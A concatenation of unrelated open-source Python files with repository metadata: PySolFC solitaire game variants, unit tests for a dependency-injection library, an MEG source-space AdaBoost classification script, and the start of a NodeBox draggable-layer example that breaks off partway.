jimsize/PySolFC | pysollib/games/picturegallery.py | 1 | 20413 | #!/usr/bin/env python
# -*- mode: python; coding: utf-8; -*-
# ---------------------------------------------------------------------------##
#
# Copyright (C) 1998-2003 Markus Franz Xaver Johannes Oberhumer
# Copyright (C) 2003 Mt. Hood Playing Card Co.
# Copyright (C) 2005-2009 Skomoroh
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# ---------------------------------------------------------------------------##
# imports
# PySol imports
from pysollib.gamedb import registerGame, GameInfo, GI
from pysollib.game import Game
from pysollib.layout import Layout
from pysollib.hint import AbstractHint
from pysollib.util import ACE, KING, QUEEN
from pysollib.stack import \
BasicRowStack, \
DealRowTalonStack, \
InvisibleStack, \
RK_FoundationStack, \
SS_FoundationStack, \
SS_RowStack, \
Stack, \
StackWrapper, \
WasteStack, \
WasteTalonStack
# ************************************************************************
# *
# ************************************************************************
class PictureGallery_Hint(AbstractHint):
def computeHints(self):
game = self.game
# 1) try if we can drop a card (i.e. an Ace)
for r in game.sg.dropstacks:
t, n = r.canDropCards(game.s.foundations)
if t and n == 1:
c = r.getCard()
assert t is not r and c
assert c.rank == ACE
if r in game.s.tableaux:
base_score = 90000 + (4 - r.cap.base_rank)
else:
base_score = 90000
score = base_score + 100 * (self.K - c.rank)
self.addHint(score, 1, r, t)
# 2) try if we can move a card to the tableaux
if not self.hints:
for r in game.sg.dropstacks:
pile = r.getPile()
if not pile or len(pile) != 1:
continue
if r in game.s.tableaux:
rr = self.ClonedStack(r, stackcards=r.cards[:-1])
if rr.acceptsCards(None, pile):
                        # do not move a card that is already in the correct place
continue
base_score = 80000 + (4 - r.cap.base_rank)
else:
base_score = 80000
# find a stack that would accept this card
for t in game.s.tableaux:
if t is not r and t.acceptsCards(r, pile):
score = base_score + 100 * (self.K - pile[0].rank)
self.addHint(score, 1, r, t)
break
# 3) Try if we can move a card from the tableaux
# to a row stack. This can only happen if there are
# no more cards to deal.
if not self.hints:
for r in game.s.tableaux:
pile = r.getPile()
if not pile or len(pile) != 1:
continue
rr = self.ClonedStack(r, stackcards=r.cards[:-1])
if rr.acceptsCards(None, pile):
                    # do not move a card that is already in the correct place
continue
# find a stack that would accept this card
for t in game.s.rows:
if t is not r and t.acceptsCards(r, pile):
score = 70000 + 100 * (self.K - pile[0].rank)
self.addHint(score, 1, r, t)
break
# 4) try if we can move a card within the row stacks
if not self.hints:
for r in game.s.rows:
pile = r.getPile()
if not pile:
continue
lp = len(pile)
lr = len(r.cards)
assert 1 <= lp <= lr
rpile = r.cards[:(lr-lp)] # remaining pile
if not pile or len(pile) != 1 or len(pile) == len(r.cards):
continue
base_score = 60000
# find a stack that would accept this card
for t in game.s.rows:
if self.shallMovePile(r, t, pile, rpile):
score = base_score + 100 * (self.K - pile[0].rank)
self.addHint(score, 1, r, t)
break
# 5) try if we can deal cards
if self.level >= 2:
if game.canDealCards():
self.addHint(self.SCORE_DEAL, 0, game.s.talon, None)
# ************************************************************************
# * Picture Gallery
# ************************************************************************
# this Foundation only accepts Aces
class PictureGallery_Foundation(RK_FoundationStack):
def __init__(self, x, y, game):
RK_FoundationStack.__init__(
self, x, y, game, base_rank=ACE, dir=0, max_move=0, max_cards=8)
self.CARD_YOFFSET = min(30, self.game.app.images.CARD_YOFFSET + 10)
def getBottomImage(self):
return self.game.app.images.getLetter(ACE)
def closeStack(self):
if len(self.cards) == 8:
if self.game.moves.state not in \
(self.game.S_REDO, self.game.S_RESTORE):
self.game.flipAllMove(self)
def canFlipCard(self):
return False
class PictureGallery_TableauStack(SS_RowStack):
def __init__(self, x, y, game, base_rank, yoffset, dir=3, max_cards=4):
SS_RowStack.__init__(
self, x, y, game,
base_rank=base_rank, dir=dir, max_cards=max_cards, max_accept=1)
self.CARD_YOFFSET = yoffset
def acceptsCards(self, from_stack, cards):
if not SS_RowStack.acceptsCards(self, from_stack, cards):
return False
# check that the base card is correct
if self.cards and self.cards[0].rank != self.cap.base_rank:
return False
return True
getBottomImage = Stack._getLetterImage
class PictureGallery_RowStack(BasicRowStack):
def acceptsCards(self, from_stack, cards):
if not BasicRowStack.acceptsCards(self, from_stack, cards):
return False
# check
if self.cards or self.game.s.talon.cards:
return False
return True
getBottomImage = Stack._getTalonBottomImage
# ************************************************************************
# *
# ************************************************************************
class PictureGallery(Game):
Hint_Class = PictureGallery_Hint
Foundation_Class = PictureGallery_Foundation
TableauStack_Classes = [
StackWrapper(
PictureGallery_TableauStack, base_rank=3, max_cards=4, dir=3),
StackWrapper(
PictureGallery_TableauStack, base_rank=2, max_cards=4, dir=3),
StackWrapper(
PictureGallery_TableauStack, base_rank=1, max_cards=4, dir=3),
]
RowStack_Class = StackWrapper(PictureGallery_RowStack, max_accept=1)
Talon_Class = DealRowTalonStack
#
# game layout
#
def createGame(self, waste=False):
rows = len(self.TableauStack_Classes)
# create layout
l, s = Layout(self), self.s
TABLEAU_YOFFSET = min(9, max(3, l.YOFFSET // 3))
# set window
th = l.YS + (12//rows-1) * TABLEAU_YOFFSET
# (set piles so that at least 2/3 of a card is visible with 10 cards)
h = (10-1)*l.YOFFSET + l.CH*2//3
self.setSize(10*l.XS+l.XM, l.YM + 3*th + l.YM + h)
# create stacks
s.addattr(tableaux=[]) # register extra stack variable
x = l.XM + 8 * l.XS + l.XS // 2
y = l.YM + l.CH // 2
s.foundations.append(self.Foundation_Class(x, y, self))
y = l.YM
for cl in self.TableauStack_Classes:
x = l.XM
for j in range(8):
s.tableaux.append(cl(x, y, self, yoffset=TABLEAU_YOFFSET))
x = x + l.XS
y = y + th
x, y = l.XM, y + l.YM
for i in range(8):
s.rows.append(self.RowStack_Class(x, y, self))
x = x + l.XS
# self.setRegion(s.rows, (-999, -999, x - l.CW // 2, 999999))
x = l.XM + 8 * l.XS + l.XS // 2
y = self.height - l.YS
s.talon = self.Talon_Class(x, y, self)
l.createText(s.talon, "se")
if waste:
y -= l.YS
s.waste = WasteStack(x, y, self)
l.createText(s.waste, "se")
self.setRegion(s.foundations, (x - l.CW // 2, -999, 999999, y - l.CH))
# define stack-groups
if waste:
ws = [s.waste]
else:
ws = []
self.sg.openstacks = s.foundations + s.tableaux + s.rows + ws
self.sg.talonstacks = [s.talon] + ws
self.sg.dropstacks = s.tableaux + s.rows + ws
#
# game overrides
#
def startGame(self):
self.s.talon.dealRow(rows=self.s.tableaux, frames=0)
self._startAndDealRow()
def isGameWon(self):
if len(self.s.foundations[0].cards) != 8:
return False
for stack in self.s.tableaux:
if len(stack.cards) != 4:
return False
return True
def fillStack(self, stack):
if self.s.talon.cards:
if stack in self.s.rows and len(stack.cards) == 0:
self.s.talon.dealRow(rows=[stack])
def shallHighlightMatch(self, stack1, card1, stack2, card2):
if card1.rank == ACE or card2.rank == ACE:
return False
return (card1.suit == card2.suit and
(card1.rank + 3 == card2.rank or card2.rank + 3 == card1.rank))
def getHighlightPilesStacks(self):
return ()
# ************************************************************************
# * Great Wheel
# ************************************************************************
class GreatWheel_Hint(PictureGallery_Hint):
shallMovePile = PictureGallery_Hint._cautiousShallMovePile
class GreatWheel_Foundation(PictureGallery_Foundation):
def acceptsCards(self, from_stack, cards):
if not PictureGallery_Foundation.acceptsCards(self, from_stack, cards):
return False
if self.cards and self.cards[-1].color == cards[0].color:
return False
return True
class GreatWheel_RowStack(BasicRowStack):
def acceptsCards(self, from_stack, cards):
if not BasicRowStack.acceptsCards(self, from_stack, cards):
return False
if self.game.s.talon.cards:
return False
if not self.cards:
return True
c1, c2 = self.cards[-1], cards[0]
return c1.suit == c2.suit and c1.rank == c2.rank+1
getBottomImage = Stack._getTalonBottomImage
class GreatWheel(PictureGallery):
Hint_Class = GreatWheel_Hint
Foundation_Class = GreatWheel_Foundation
TableauStack_Classes = [
StackWrapper(
PictureGallery_TableauStack, base_rank=2, max_cards=5, dir=2),
StackWrapper(
PictureGallery_TableauStack, base_rank=1, max_cards=6, dir=2),
]
RowStack_Class = StackWrapper(GreatWheel_RowStack, max_accept=1)
Talon_Class = StackWrapper(WasteTalonStack, max_rounds=1)
def createGame(self):
PictureGallery.createGame(self, waste=True)
def fillStack(self, stack):
if stack is self.s.waste and not stack.cards:
self.s.talon.dealCards()
if self.s.talon.cards or self.s.waste.cards:
if stack in self.s.rows and len(stack.cards) == 0:
old_state = self.enterState(self.S_FILL)
for i in range(4):
if not self.s.waste.cards:
self.s.talon.dealCards()
if self.s.waste.cards:
self.s.waste.moveMove(1, stack)
self.leaveState(old_state)
def startGame(self):
self.startDealSample()
for i in range(4):
self.s.talon.dealRow()
self.s.talon.dealCards()
def isGameWon(self):
if len(self.s.foundations[0].cards) != 8:
return False
if self.s.talon.cards or self.s.waste.cards:
return False
for stack in self.s.rows:
if stack.cards:
return False
return True
def shallHighlightMatch(self, stack1, card1, stack2, card2):
if card1.rank == ACE or card2.rank == ACE:
return False
return (card1.suit == card2.suit and
(card1.rank + 2 == card2.rank or card2.rank + 2 == card1.rank))
# ************************************************************************
# * Mount Olympus
# * Zeus
# ************************************************************************
class MountOlympus_Foundation(SS_FoundationStack):
def getHelp(self):
return 'Build up in suit by twos.'
class MountOlympus_RowStack(SS_RowStack):
def getHelp(self):
return 'Build down in suit by twos.'
class MountOlympus(Game):
RowStack_Class = MountOlympus_RowStack
def createGame(self):
# create layout
l, s = Layout(self), self.s
# set window
self.setSize(l.XM+9*l.XS, l.YM+3*l.YS+12*l.YOFFSET)
# create stacks
x, y = l.XM+l.XS, l.YM
for i in range(8):
s.foundations.append(
MountOlympus_Foundation(
x, y, self,
suit=i//2, base_rank=ACE, dir=2, max_move=0, max_cards=7))
x += l.XS
x, y = l.XM+l.XS, l.YM+l.YS
for i in range(8):
s.foundations.append(
MountOlympus_Foundation(
x, y, self,
suit=i//2, base_rank=1, dir=2, max_move=0, max_cards=6))
x += l.XS
x, y = l.XM, l.YM+2*l.YS
for i in range(9):
s.rows.append(self.RowStack_Class(x, y, self, dir=-2))
x += l.XS
s.talon = DealRowTalonStack(l.XM, l.YM, self)
l.createText(s.talon, 's')
# define stack-groups
l.defaultStackGroups()
def _shuffleHook(self, cards):
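        # Move the aces and twos to the top of the deck so they are dealt
        # straight onto the foundations at the start of the game.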
return self._shuffleHookMoveToTop(
cards,
lambda c: (c.rank in (ACE, 1), (c.rank, c.suit)))
def startGame(self):
self.startDealSample()
self.s.talon.dealRow(rows=self.s.foundations)
self.s.talon.dealRow()
def fillStack(self, stack):
if self.s.talon.cards:
if stack in self.s.rows and len(stack.cards) == 0:
self.s.talon.dealRow(rows=[stack])
def shallHighlightMatch(self, stack1, card1, stack2, card2):
return (card1.suit == card2.suit and
(card1.rank + 2 == card2.rank or card2.rank + 2 == card1.rank))
class Zeus_RowStack(MountOlympus_RowStack):
def acceptsCards(self, from_stack, cards):
if not MountOlympus_RowStack.acceptsCards(self, from_stack, cards):
return False
if not self.cards:
return cards[0].rank in (QUEEN, KING)
return True
class Zeus(MountOlympus):
RowStack_Class = Zeus_RowStack
def startGame(self):
self.s.talon.dealRow(rows=self.s.foundations, frames=0)
self.startDealSample()
for i in range(4):
self.s.talon.dealRow()
# ************************************************************************
# * Royal Parade
# ************************************************************************
class RoyalParade_TableauStack(PictureGallery_TableauStack):
def _canSwapPair(self, from_stack):
if from_stack not in self.game.s.tableaux:
return False
if len(self.cards) != 1 or len(from_stack.cards) != 1:
return False
c0, c1 = from_stack.cards[0], self.cards[0]
return (c0.rank == self.cap.base_rank and
c1.rank == from_stack.cap.base_rank)
def acceptsCards(self, from_stack, cards):
if self._canSwapPair(from_stack):
return True
return PictureGallery_TableauStack.acceptsCards(
self, from_stack, cards)
def moveMove(self, ncards, to_stack, frames=-1, shadow=-1):
if self._canSwapPair(to_stack):
self._swapPairMove(ncards, to_stack, frames=-1, shadow=0)
else:
PictureGallery_TableauStack.moveMove(self, ncards, to_stack,
frames=frames, shadow=shadow)
def _swapPairMove(self, n, other_stack, frames=-1, shadow=-1):
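        # Swap two single cards by parking one of them on the invisible
        # helper stack while the other one moves across.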
game = self.game
old_state = game.enterState(game.S_FILL)
swap = game.s.internals[0]
game.moveMove(n, self, swap, frames=0)
game.moveMove(n, other_stack, self, frames=frames, shadow=shadow)
game.moveMove(n, swap, other_stack, frames=0)
game.leaveState(old_state)
class RoyalParade(PictureGallery):
Talon_Class = DealRowTalonStack
TableauStack_Classes = [
StackWrapper(RoyalParade_TableauStack,
base_rank=1, max_cards=4, dir=3),
StackWrapper(RoyalParade_TableauStack,
base_rank=2, max_cards=4, dir=3),
StackWrapper(RoyalParade_TableauStack,
base_rank=3, max_cards=4, dir=3),
]
RowStack_Class = StackWrapper(BasicRowStack, max_accept=0)
def createGame(self):
PictureGallery.createGame(self)
self.s.internals.append(InvisibleStack(self))
def startGame(self):
self.startDealSample()
self.s.talon.dealRow(rows=self.s.tableaux)
self.s.talon.dealRow()
# ************************************************************************
# * Virginia Reel
# ************************************************************************
class VirginiaReel_Talon(DealRowTalonStack):
def canDealCards(self):
if not DealRowTalonStack.canDealCards(self):
return False
for s in self.game.s.tableaux:
if not s.cards:
return False
return True
class VirginiaReel(RoyalParade):
Talon_Class = VirginiaReel_Talon
def _shuffleHook(self, cards):
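        # Set aside one card of each tableau base rank (a 2, a 3 and a 4) so
        # the opening deal places them on the leftmost tableau pile of each row.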
bottom_cards = []
ranks = []
for c in cards[:]:
if c.rank in (1, 2, 3) and c.rank not in ranks:
ranks.append(c.rank)
cards.remove(c)
bottom_cards.append(c)
if len(ranks) == 3:
break
bottom_cards.sort(key=lambda x: -x.rank)
return cards+bottom_cards
def startGame(self):
self.s.talon.dealRow(rows=self.s.tableaux[0::8], frames=0)
self.startDealSample()
for i in range(3):
rows = self.s.tableaux[i*8+1:i*8+8]
self.s.talon.dealRow(rows=rows)
self.s.talon.dealRow()
def fillStack(self, stack):
pass
# register the game
registerGame(GameInfo(7, PictureGallery, "Picture Gallery",
GI.GT_2DECK_TYPE, 2, 0, GI.SL_BALANCED,
altnames=("Die Bildgallerie", "Mod-3")))
registerGame(GameInfo(397, GreatWheel, "Great Wheel",
GI.GT_2DECK_TYPE, 2, 0, GI.SL_BALANCED,
ranks=list(range(12)) # without Kings
))
registerGame(GameInfo(398, MountOlympus, "Mount Olympus",
GI.GT_2DECK_TYPE, 2, 0, GI.SL_BALANCED))
registerGame(GameInfo(399, Zeus, "Zeus",
GI.GT_2DECK_TYPE, 2, 0, GI.SL_BALANCED))
registerGame(GameInfo(546, RoyalParade, "Royal Parade",
GI.GT_2DECK_TYPE, 2, 0, GI.SL_MOSTLY_SKILL,
rules_filename='virginiareel.html'))
registerGame(GameInfo(547, VirginiaReel, "Virginia Reel",
GI.GT_2DECK_TYPE, 2, 0, GI.SL_MOSTLY_SKILL))
| gpl-3.0 | 1,956,107,269,263,925,200 | 33.953767 | 79 | 0.529662 | false |
shadowmint/python-nark | tests/nark/resolve_tests.py | 1 | 10766 | # Copyright 2013 Douglas Linder
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import unittest
import bootstrap
from nark import *
class ResolverTests(unittest.TestCase):
def test_can_resolve_decroated_class(self):
class IPrinter(object):
def prints(self, msg):
pass
class IValuer(object):
def value(self, a, b):
pass
@implements(IPrinter)
class Printer(object):
def prints(self, msg):
return "prints-" + str(msg)
@implements(IValuer)
class Valuer(object):
def value(self, a, b):
return a + b
c = Scope()
c.register(Printer)
c.register(Valuer)
@resolve(c)
class HasDeps(object):
def __init__(self, valuer=IValuer, printer=IPrinter):
self.valuer = valuer
self.printer = printer
a = Assert()
instance = HasDeps()
output1 = instance.printer.prints("hello")
output2 = instance.valuer.value(10, 10)
a.equals(output1, "prints-hello", "Failed to resolve printer")
a.equals(output2, 20, "Failed to resolve valuer")
def test_can_resolve_decroated_class_from_array(self):
class IPrinter(object):
def prints(self, msg):
pass
class IValuer(object):
def value(self, a, b):
pass
@implements(IPrinter)
class Printer(object):
def prints(self, msg):
return "prints-" + str(msg)
@implements(IValuer)
class Valuer(object):
def value(self, a, b):
return a + b
c = [ Printer, Valuer ]
@resolve(c)
class HasDeps(object):
def __init__(self, valuer=IValuer, printer=IPrinter):
self.valuer = valuer
self.printer = printer
a = Assert()
instance = HasDeps()
output1 = instance.printer.prints("hello")
output2 = instance.valuer.value(10, 10)
a.equals(output1, "prints-hello", "Failed to resolve printer")
a.equals(output2, 20, "Failed to resolve valuer")
def test_can_resolve_decroated_compound_class(self):
class IPrinter(object):
def prints(self, msg):
pass
class IValuer(object):
def value(self, a, b):
pass
@implements(IValuer, IPrinter)
class Crazy(object):
def value(self, a, b):
return a - b
def prints(self, msg):
return "hello-" + str(msg)
c = [ Crazy ]
@resolve(c)
class HasDeps(object):
def __init__(self, valuer=IValuer, printer=IPrinter):
self.valuer = valuer
self.printer = printer
a = Assert()
instance = HasDeps()
output1 = instance.printer.prints("hello")
output2 = instance.valuer.value(10, 10)
a.equals(output1, "hello-hello", "Failed to resolve printer")
a.equals(output2, 0, "Failed to resolve valuer")
def test_can_resolve_instance(self):
class IDb(object):
def data(self):
pass
@implements(IDb)
class Db(object):
def __init__(self):
self._data = {}
def data(self):
return self._data
scope = Scope()
scope.register(Db, per_call=True)
@resolve(scope)
class UsesDb(object):
def __init__(self, db=IDb):
self.db = db
a = Assert()
i1 = UsesDb()
i2 = UsesDb()
i1.db.data()["key"] = "value1"
i2.db.data()["key"] = "value2"
a.equals(i1.db.data()["key"], "value1", "Object was unexpectedly singleton")
a.equals(i2.db.data()["key"], "value2", "Object was unexpectedly singleton")
def test_cant_accidentally_resolve_instance(self):
class IDb(object):
def data(self):
pass
@implements(IDb)
class Db(object):
def __init__(self):
self._data = {}
def data(self):
return self._data
scope = [Db]
@resolve(scope)
class UsesDb(object):
def __init__(self, db=IDb):
self.db = db
a = Assert()
i1 = UsesDb()
i2 = UsesDb()
i1.db.data()["key"] = "value"
a.equals(i2.db.data()["key"], "value", "Object was not a singleton")
i2.db.data()["key"] = "value2"
a.equals(i1.db.data()["key"], "value2", "Object was not a singleton")
def test_can_resolve_deep_query(self):
class IDb(object):
def data(self):
pass
@implements(IDb)
class Db(object):
def data(self):
return 10
scope = [Db]
@resolve(scope)
class UsesDb(object):
def __init__(self, db=IDb):
self.db = db
class HasDep(object):
def __init__(self):
self.service = UsesDb()
a = Assert()
i = HasDep()
value = i.service.db.data()
a.equals(value, 10, "Failed to resolve something with a resolvable child")
def text_complex_init_flags_dont_screw_things_up(self):
class IPrinter(object):
def prints(self, msg):
pass
class IValuer(object):
def value(self, a, b):
pass
@implements(IPrinter)
class Printer(object):
def prints(self, msg):
return "prints-" + str(msg)
@implements(IValuer)
class Valuer(object):
def value(self, a, b):
return a + b
c = Scope()
c.register(Printer)
c.register(Valuer)
@resolve(c)
class HasDeps(object):
def __init__(self, x, y, valuer=IValuer, printer=IPrinter, *kargs, **kwargs):
self.valuer = valuer
self.printer = printer
self.x = x
self.y = y
self.other = kargs[0]
self.left = kwargs["left"]
a = Assert()
instance = HasDeps(5, 10, 15, left="right")
output1 = instance.printer.prints("hello")
output2 = instance.valuer.value(10, 10)
a.equals(output1, "prints-hello", "Failed to resolve printer")
a.equals(output2, 20, "Failed to resolve valuer")
a.equals(instance.x, 5, "Invalid x value")
a.equals(instance.y, 10, "Invalid y value")
a.equals(instance.other, 15, "Invalid kargs value")
a.equals(instance.left, "right", "Invalid kwargs value")
def test_passing_mock_as_argument_works(self):
class IPrinter(object):
def prints(self, msg):
pass
class IValuer(object):
def value(self, a, b):
pass
@implements(IPrinter)
class Printer(object):
def prints(self, msg):
return "prints-" + str(msg)
@implements(IValuer)
class Valuer(object):
def value(self, a, b):
return a + b
c = Scope()
c.register(Printer)
c.register(Valuer)
class MockPrinter(object):
def prints(self, msg):
return "blah"
@resolve(c)
class HasDeps(object):
def __init__(self, x, y, valuer=IValuer, printer=IPrinter, **kwargs):
self.valuer = valuer
self.printer = printer
self.x = x
self.y = y
self.other = kwargs["other"]
a = Assert()
instance = HasDeps(5, 10, other=15, printer=MockPrinter())
output1 = instance.printer.prints("hello")
output2 = instance.valuer.value(10, 10)
a.equals(output1, "blah", "Failed to use mock printer")
a.equals(output2, 20, "Failed to resolve valuer")
a.equals(instance.x, 5, "Invalid x value")
a.equals(instance.y, 10, "Invalid y value")
a.equals(instance.other, 15, "Invalid kargs value")
def test_inject_with_no_binding_fails(self):
class IPrinter(object):
def prints(self, msg):
pass
@implements(IPrinter)
class Printer(object):
def prints(self, msg):
return "prints-" + str(msg)
c = Scope()
@resolve(c)
class HasDeps(object):
def __init__(self, printer=IPrinter):
self.printer = printer
a = Assert()
failed = False
try:
instance = HasDeps(5, 10, other=15)
except ResolveFailedException:
failed = True
a.true(failed, "Resolved a missing type")
def test_inject_with_stupid_type_fails(self):
class IPrinter(object):
def prints(self, msg):
pass
@implements(IPrinter)
class Printer(object):
def __init__(self, stupid):
pass
def prints(self, msg):
return "prints-" + str(msg)
c = Scope()
c.register(Printer)
@resolve(c)
class HasDeps(object):
def __init__(self, printer=IPrinter):
self.printer = printer
a = Assert()
failed = False
try:
instance = HasDeps(5, 10, other=15)
except ResolveFailedException:
e = exception()
failed = True
a.true(failed, "Resolved a bad type")
def test_passing_stupid_class_fails(self):
class IPrinter(object):
def prints(self, msg):
pass
class IValuer(object):
def value(self, a, b):
pass
@implements(IPrinter)
class Printer(object):
def __init__(self, value): # <-- Stupid, needs zero value constructor
pass
def prints(self, msg):
return "prints-" + str(msg)
@implements(IValuer)
class Valuer(object):
def value(self, a, b):
return a + b
c = Scope()
c.register(Printer)
c.register(Valuer)
@resolve(c)
class HasDeps(object):
def __init__(self, valuer=IValuer, printer=IPrinter):
self.valuer = valuer
self.printer = printer
a = Assert()
failed = False
try:
instance = HasDeps()
except ResolveFailedException:
e = exception()
failed = True
a.trace(e)
a.equals(e.type, Printer, "Didnt set correct exception value")
a.true(failed, "Didn't fail")
def test_when_failing_to_resolve_type_exception_has_type_set(self):
class IPrinter(object):
def prints(self, msg):
pass
class IValuer(object):
def value(self, a, b):
pass
@implements(IValuer)
class Valuer(object):
def value(self, a, b):
return a + b
c = Scope()
c.register(Valuer)
@resolve(c)
class HasDeps(object):
def __init__(self, valuer=IValuer, printer=IPrinter):
self.valuer = valuer
self.printer = printer
a = Assert()
failed = False
try:
instance = HasDeps()
except ResolveFailedException:
e = exception()
failed = True
a.trace(e)
a.equals(e.type, IPrinter, "Didnt set correct exception value")
a.true(failed, "Didn't fail")
if __name__ == "__main__":
unittest.main()
| apache-2.0 | 7,929,102,423,830,692,000 | 22.053533 | 83 | 0.597343 | false |
MadsJensen/malthe_alpha_project | adaboost_src_label.py | 1 | 5002 | """Doc string Here."""
import mne
from mne.minimum_norm import (apply_inverse_epochs, read_inverse_operator)
import socket
import numpy as np
# import matplotlib.pyplot as plt
from sklearn.ensemble import AdaBoostClassifier
# from sklearn.tree import DecisionTreeClassifier
# from sklearn.metrics import confusion_matrix
from sklearn.cross_validation import StratifiedKFold
from sklearn.preprocessing import scale
# import seaborn as sns
# Setup paths and prepare raw data
hostname = socket.gethostname()
if hostname == "Wintermute":
# data_path = "/home/mje/mnt/caa/scratch/"
data_path = "/home/mje/Projects/malthe_alpha_project/data/"
n_jobs = 1
else:
data_path = "/projects/MINDLAB2015_MEG-CorticalAlphaAttention/scratch/"
n_jobs = 1
subjects_dir = data_path + "fs_subjects_dir/"
fname_inv = data_path + '0001-meg-oct-6-inv.fif'
fname_epochs = data_path + '0001_p_03_filter_ds_ica-mc_tsss-epo.fif'
fname_evoked = data_path + "0001_p_03_filter_ds_ica-mc_raw_tsss-ave.fif"
snr = 1.0 # Standard assumption for average data but using it for single trial
lambda2 = 1.0 / snr ** 2
method = "dSPM" # use dSPM method (could also be MNE or sLORETA)
# load labels
labels = mne.read_labels_from_annot('0001', parc='PALS_B12_Lobes',
# regexp="Bro",
subjects_dir=subjects_dir)
labels_occ = [labels[9], labels[10]]
# Load data
inverse_operator = read_inverse_operator(fname_inv)
epochs = mne.read_epochs(fname_epochs)
epochs.crop(0, 1.1)
epochs.resample(200)
stcs_ent_left = apply_inverse_epochs(epochs["ent_left"], inverse_operator,
lambda2, method, pick_ori="normal")
stcs_ent_right = apply_inverse_epochs(epochs["ent_right"], inverse_operator,
lambda2, method, pick_ori="normal")
stcs_ctl_left = apply_inverse_epochs(epochs["ctl_left"], inverse_operator,
lambda2, method, pick_ori="normal")
#src_ctl_l = np.asarray([stc.data.reshape(-1) for stc in stcs_ctl_left])
#src_ent_l = np.asarray([stc.data.reshape(-1) for stc in stcs_ent_left])
#data_ctl_l = np.squeeze(np.asarray(
# mne.extract_label_time_course(stcs_ctl_left,
# labels_occ[1],
# inverse_operator["src"],
# mode="pca_flip")))
#
#data_ent_l = np.squeeze(np.asarray(
# mne.extract_label_time_course(stcs_ent_left,
# labels_occ[1],
# inverse_operator["src"],
# mode="pca_flip")))
data_ent_l = np.asarray([stc.in_label(labels_occ[1]).data.reshape(-1)
for stc in stcs_ent_left])
data_ent_r = np.asarray([stc.in_label(labels_occ[1]).data.reshape(-1)
for stc in stcs_ent_right])
# data_ctl_l = [stc.in_label(labels_occ[1]).data.reshape(-1)
# for stc in stcs_ctl_left]
X = np.vstack([data_ent_l, data_ent_r])  # data for classification
# Classes for X
y = np.concatenate([np.zeros(len(data_ent_l)), np.ones(len(data_ent_r))])
# Set up the classifier
bdt = AdaBoostClassifier(algorithm="SAMME.R",
n_estimators=1000)
n_folds = 10 # number of folds used in cv
cv = StratifiedKFold(y, n_folds=n_folds)
scores = np.zeros(n_folds)  # array to save scores
feature_importance = np.zeros(X.shape[1]) # array to save features
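# Manual cross-validation: fit the booster on each training fold, score it on
# the held-out fold and accumulate the feature importances across folds.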
for ii, (train, test) in enumerate(cv):
bdt.fit(X[train], y[train])
y_pred = bdt.predict(X[test])
y_test = y[test]
scores[ii] = np.sum(y_pred == y_test) / float(len(y_test))
feature_importance += bdt.feature_importances_
feature_importance_std = scale(feature_importance)
feature_importance /= (ii + 1) # create average importance
# # create mask to avoid division error
# feature_importance = np.ma.masked_array(feature_importance,
# feature_importance == 0)
# # normalize scores for visualization purposes
# feature_importance /= feature_importance.std(axis=1)[:, None]
# feature_importance -= feature_importance.mean(axis=1)[:, None]
vertices = [np.array([], int), stc.in_label(labels_occ[1]).rh_vertno]
shape = stcs_ent_left[0].in_label(labels_occ[1]).shape
stc_feat = mne.SourceEstimate(feature_importance.reshape(shape), vertices=vertices,
tmin=0, tstep=stc.tstep,
subject='0001')
stc_feat.save(data_path + "stc_adaboost_feature_label_LvR")
stc_feat_std = mne.SourceEstimate(feature_importance_std.reshape(shape),
vertices=vertices,
tmin=0, tstep=stc.tstep,
subject='0001')
stc_feat_std.save(data_path + "stc_adaboost_feature_label_std_LvR")
np.savetxt(data_path + "adaboost_label_scores_LvR.csv", scores, delimiter=",")
# scores_10 = cross_val_score(bdt, X, y, cv=10, n_jobs=1, verbose=False)
| mit | -3,565,453,520,309,966,000 | 36.609023 | 83 | 0.621351 | false |
pepsipepsi/nodebox_opengl_python3 | examples/09-layer/01-drag.py | 1 | 3947 | import os, sys
sys.path.insert(0, os.path.join("..",".."))
from nodebox.graphics.context import *
from nodebox.graphics import *
# In the previous examples, drawing occurs directly to the canvas.
# It is also possible to draw into different layers,
# and then transform / animate the layers individually.
# The Layer class introduces a lot of useful functionality:
# - layers can receive events from the mouse,
# - layers have an origin point (e.g. "center") from which transformations originate,
# - layers have methods such as Layer.rotate() and Layer.scale(),
# - layers can enable motion tweening (i.e. smooth, automatic transitions).
# A Layer has its personal Layer.draw() method that contains drawing commands.
# In this example, we create a subclass of Layer to display a colored, draggable rectangle:
class DraggableRect(Layer):
def __init__(self, *args, **kwargs):
# A Layer with an extra "clr" property.
Layer.__init__(self, *args, **kwargs)
self.clr = Color(0, 0.75)
def draw(self):
rect(0, 0, self.width, self.height, fill=self.clr, stroke=self.clr)
def on_mouse_enter(self, mouse):
# When the mouse hovers over the rectangle, highlight it.
mouse.cursor = HAND
self.clr.a = 0.75
def on_mouse_leave(self, mouse):
# Reset the mouse cursor when the mouse exits the rectangle.
mouse.cursor = DEFAULT
self.clr.a = 0.5
def on_mouse_drag(self, mouse):
# When the rectangle is dragged, transform it.
# Its scale increases as the mouse is moved up.
# Its angle increases as the mouse is moved left or right.
self.scale(1 + 0.005 * mouse.dy)
self.rotate(mouse.dx)
# The layer's origin defines the origin point for the layer's placement,
# its rotation and scale. If it is (0.5, 0.5), this means the layer will transform
# from its center (i.e. 50% width and 50% height). If you supply integers,
# the values will be interpreted as an absolute offset from the layer's bottom-left corner.
r1 = DraggableRect(x=200, y=200, width=200, height=200, origin=(0.5,0.5), name="blue1")
r1.clr = color(0.0, 0.5, 0.75, 0.5)
r2 = DraggableRect(x=250, y=250, width=200, height=200, origin=(0.5,0.5), name="blue2")
r2.clr = color(0.0, 0.5, 0.75, 0.5)
r3 = DraggableRect(x=300, y=300, width=200, height=200, origin=(0.5,0.5), name="purple1")
r3.clr = color(0.25, 0.15, 0.75, 0.5)
# We'll attach a layer as a child to layer r3.
